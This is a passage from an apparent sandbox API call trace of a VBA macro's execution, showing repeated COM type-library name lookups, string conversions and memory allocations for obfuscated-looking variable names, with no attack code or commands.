cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_wAoGAQAD") returned 16 [0068.955] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_wAoGAQAD", lHashVal=0x1049ba, wFlags=0x3, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x77005f00720061, ppTypeComp=0x41004700000000, pDummy=0x0) returned 0x0 [0068.955] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a61a82 | out: _Dst=0x144ec0) returned 0x0 [0068.955] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2d3a | out: _Dst=0x67c2d40) returned 0x0 [0068.955] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Hex") returned 0x1055b0 [0068.955] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.955] IUnknown:Release (This=0x665ba50) returned 0xd [0068.955] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.955] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.955] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.955] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.955] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.956] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.956] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.956] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.956] IUnknown:Release (This=0x665ba50) returned 0xd [0068.956] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.956] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.956] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.956] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612737, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.956] IMalloc:Realloc (This=0x7fefec05380, pv=0x397070, cb=0x180) returned 0xafc7910 [0068.956] VirtualAlloc (lpAddress=0x0, dwSize=0x4000, flAllocationType=0x1000, flProtect=0x4) returned 0x4b40000 [0068.957] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.957] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.957] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.957] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.957] IUnknown:Release (This=0x665ba50) returned 0xd [0068.957] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.957] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.957] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.957] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.957] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.957] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.957] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.957] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.957] IUnknown:Release (This=0x665ba50) returned 0xd [0068.957] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.957] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.957] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.957] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.957] IMalloc:Alloc (This=0x7fefec05380, cb=0xb) returned 0x67c2d40 [0068.957] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x4, _Src=0x34d2cea | out: _Dst=0x67c2d40) returned 0x0 [0068.957] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_Oct") returned 0x107ad1 [0068.958] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.958] IUnknown:Release (This=0x665ba50) returned 0xd [0068.958] IUnknown:AddRef (This=0xaf0b528) returned 0x5 [0068.958] IUnknown:Release (This=0xaf0b528) returned 0x4 [0068.958] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.958] IUnknown:QueryInterface (in: This=0xaf0b528, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.958] IMalloc:Free (This=0x7fefec05380, pv=0x67c2d40) [0068.958] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b528, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.958] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.958] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.958] IUnknown:Release (This=0x665ba50) returned 0xd [0068.958] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.958] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.958] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.958] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b528, memid=1610612739, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.958] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.958] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.958] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.958] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.958] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.958] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.958] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.958] IUnknown:Release (This=0x665ba50) returned 0xd [0068.958] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612745, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.959] IUnknown:AddRef (This=0xaf0b6e0) returned 0x5 [0068.959] IUnknown:Release (This=0xaf0b6e0) returned 0x4 [0068.959] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b25af8*(Data1=0xcacc1e82, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f98 | out: ppvObject=0x144f98*=0x0) returned 0x80004002 [0068.959] IUnknown:QueryInterface (in: This=0xaf0b6e0, riid=0x7fee3b30b98*(Data1=0xcacc1e83, Data2=0x622b, Data3=0x11d2, Data4=([0]=0xaa, [1]=0x78, [2]=0x0, [3]=0xc0, [4]=0x4f, [5]=0x99, [6]=0x1, [7]=0xd2)), ppvObject=0x144f90 | out: ppvObject=0x144f90*=0x0) returned 0x80004002 [0068.959] ITypeInfo:RemoteGetContainingTypeLib (in: This=0xaf0b6e0, ppTLib=0x1447d0, pIndex=0x0 | out: ppTLib=0x1447d0*=0x665ba50, pIndex=0x0) returned 0x0 [0068.959] ITypeLib:RemoteGetLibAttr (in: This=0x665ba50, ppTLibAttr=0x1447e0, pDummy=0x0 | out: ppTLibAttr=0x1447e0, pDummy=0x0) returned 0x0 [0068.959] ITypeLib:LocalReleaseTLibAttr (This=0x665ba50) returned 0x0 [0068.959] IUnknown:Release (This=0x665ba50) returned 0xd [0068.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x1447d0, pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0 | out: pBstrDllName=0x0, pbstrName=0x0, pwOrdinal=0x2703ce0*=0x5380) returned 0x0 [0068.959] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="VBE7.DLL", cchWideChar=-1, lpMultiByteStr=0x7fee3b5d830, cbMultiByte=1023, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="VBE7.DLL", lpUsedDefaultChar=0x0) returned 9 [0068.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x1447d0, pbstrName=0x0, pwOrdinal=0x1447f0 | out: pBstrDllName=0x1447d0*=0x0, pbstrName=0x0, pwOrdinal=0x1447f0*=0x4a60) returned 0x0 [0068.959] ITypeInfo:RemoteGetDllEntry (in: This=0xaf0b6e0, memid=1610612744, invkind=1, refPtrFlags=0x0, pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000 | out: pBstrDllName=0x0, pbstrName=0x1447d0, pwOrdinal=0x500000000) returned 0x0 [0068.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TDA_AAAA") returned 9 [0068.959] ITypeComp:RemoteBind (in: This=0x665ba60, szName="TDA_AAAA", lHashVal=0x104310, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TDA_AAAA") returned 9 [0068.959] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="TDA_AAAA", lHashVal=0x104310, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.959] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TDA_AAAA") returned 9 [0068.959] ITypeComp:RemoteBind (in: This=0x665bd30, szName="TDA_AAAA", lHashVal=0x104310, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="TDA_AAAA") returned 0x104310 [0068.960] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x9, _Src="TDA_AAAA" | out: _Dst="TDA_AAAA") returned 0x0 [0068.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=9, lpWideCharStr=0x144af0, cchWideChar=9 | out: lpWideCharStr="TDA_AAAA") returned 9 [0068.960] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.960] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="TDA_AAAA", lHashVal=0x104310, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.960] IUnknown:Release (This=0x665ba50) returned 0xd [0068.960] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.960] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="TDA_AAAA", lHashVal=0x104310, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.960] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.960] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.960] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="TDA_AAAA", lHashVal=0x104310, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.960] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.960] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.960] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="TDA_AAAA", lHashVal=0x104310, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.960] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a619da, cbMultiByte=9, lpWideCharStr=0x144d40, cchWideChar=10 | out: lpWideCharStr="TDA_AAAA") returned 9 [0068.960] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="TDA_AAAA", lHashVal=0x104310, wFlags=0x5, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.960] IMalloc:Alloc (This=0x7fefec05380, cb=0x10) returned 0x67c2d40 [0068.960] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x9, _Src=0x3a619da | out: _Dst=0x67c2d40) returned 0x0 [0068.960] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_TDA_AAAA") returned 0x101a99 [0068.960] strcpy_s (in: _Dst=0x144e50, _DstSize=0x10, _Src="_B_var_TDA_AAAA" | out: _Dst="_B_var_TDA_AAAA") returned 0x0 [0068.960] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144e50, cbMultiByte=16, lpWideCharStr=0x144ca0, cchWideChar=16 | out: lpWideCharStr="_B_var_TDA_AAAA") returned 16 [0068.960] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.960] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="_B_var_TDA_AAAA", lHashVal=0x101a99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.960] IUnknown:Release (This=0x665ba50) returned 0xd [0068.960] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.960] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="_B_var_TDA_AAAA", lHashVal=0x101a99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.960] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.961] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.961] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="_B_var_TDA_AAAA", lHashVal=0x101a99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.961] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.961] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.961] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="_B_var_TDA_AAAA", lHashVal=0x101a99, pfName=0x144d70, pBstrLibName=0x144ca0 | out: pfName=0x144d70*=0, pBstrLibName=0x144ca0) returned 0x0 [0068.961] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.961] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.961] IUnknown:Release (This=0x665ba50) returned 0xd [0068.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x4b105ee, cbMultiByte=16, lpWideCharStr=0x144d00, cchWideChar=17 | out: lpWideCharStr="_B_var_TDA_AAAA") returned 16 [0068.961] ITypeComp:RemoteBind (in: This=0x665ba60, szName="_B_var_TDA_AAAA", lHashVal=0x101a99, wFlags=0x5, ppTInfo=0x144cb8, pDescKind=0x144ccc, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0 | out: ppTInfo=0x144cb8*=0x0, pDescKind=0x144ccc*=0, ppFuncDesc=0x144cd0, ppVarDesc=0x54005f00720061, ppTypeComp=0x41005f00000000, pDummy=0x0) returned 0x0 [0068.961] _mbscpy_s (in: _Dst=0x144ec0, _DstSizeInBytes=0x9, _Src=0x3a619da | out: _Dst=0x144ec0) returned 0x0 [0068.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ad6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qGAABAU") returned 8 [0068.961] ITypeComp:RemoteBind (in: This=0x665ba60, szName="qGAABAU", lHashVal=0x10fe0d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ad6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qGAABAU") returned 8 [0068.961] ITypeComp:RemoteBind (in: This=0x631b4d0, szName="qGAABAU", lHashVal=0x10fe0d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ad6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qGAABAU") returned 8 [0068.961] ITypeComp:RemoteBind (in: This=0x665bd30, szName="qGAABAU", lHashVal=0x10fe0d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0xaf05cb0, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.961] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="qGAABAU") returned 0x10fe0d [0068.961] strcpy_s (in: _Dst=0x144ca0, _DstSize=0x8, _Src="qGAABAU" | out: _Dst="qGAABAU") returned 0x0 [0068.961] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x144ca0, cbMultiByte=8, lpWideCharStr=0x144af0, cchWideChar=8 | out: lpWideCharStr="qGAABAU") returned 8 [0068.961] IUnknown:AddRef (This=0x665ba50) returned 0xe [0068.962] ITypeLib:RemoteIsName (in: This=0x665ba50, szNameBuf="qGAABAU", lHashVal=0x10fe0d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.962] IUnknown:Release (This=0x665ba50) returned 0xd [0068.962] IUnknown:AddRef (This=0x631b4c0) returned 0xc [0068.962] ITypeLib:RemoteIsName (in: This=0x631b4c0, szNameBuf="qGAABAU", lHashVal=0x10fe0d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.962] IUnknown:Release (This=0x631b4c0) returned 0xb [0068.962] IUnknown:AddRef (This=0x665bd20) returned 0x7 [0068.962] ITypeLib:RemoteIsName (in: This=0x665bd20, szNameBuf="qGAABAU", lHashVal=0x10fe0d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.962] IUnknown:Release (This=0x665bd20) returned 0x6 [0068.962] IUnknown:AddRef (This=0x665b4b0) returned 0x5 [0068.962] ITypeLib:RemoteIsName (in: This=0x665b4b0, szNameBuf="qGAABAU", lHashVal=0x10fe0d, pfName=0x144bc0, pBstrLibName=0x144af0 | out: pfName=0x144bc0*=0, pBstrLibName=0x144af0) returned 0x0 [0068.962] IUnknown:Release (This=0x665b4b0) returned 0x4 [0068.962] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x0, lpMultiByteStr=0x3a61ad6, cbMultiByte=8, lpWideCharStr=0x144d40, cchWideChar=9 | out: lpWideCharStr="qGAABAU") returned 8 [0068.962] ITypeComp:RemoteBind (in: This=0x665b4c0, szName="qGAABAU", lHashVal=0x10fe0d, wFlags=0x3, ppTInfo=0x144cf8, pDescKind=0x144d0c, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0 | out: ppTInfo=0x144cf8*=0x0, pDescKind=0x144d0c*=0, ppFuncDesc=0x144d10, ppVarDesc=0x7fee395230a, ppTypeComp=0x0, pDummy=0x0) returned 0x0 [0068.962] IMalloc:Alloc (This=0x7fefec05380, cb=0xf) returned 0x67c2d40 [0068.962] _mbscpy_s (in: _Dst=0x67c2d40, _DstSizeInBytes=0x8, _Src=0x3a61ad6 | out: _Dst=0x67c2d40) returned 0x0 [0068.962] LHashValOfNameSysA (syskind=0x3, lcid=0x409, szName="_B_var_qGAABAU") returned 0x100152 [0068.962] strcpy_s (in: _Dst=0x144e50, _DstSize=0xf, _Src="_B_var_qGAABAU" | out: _Dst="_B_var_qGAABAU") returned 0x0 [0068.962] MultiByteToWideChar (in: CodePage=0x0, 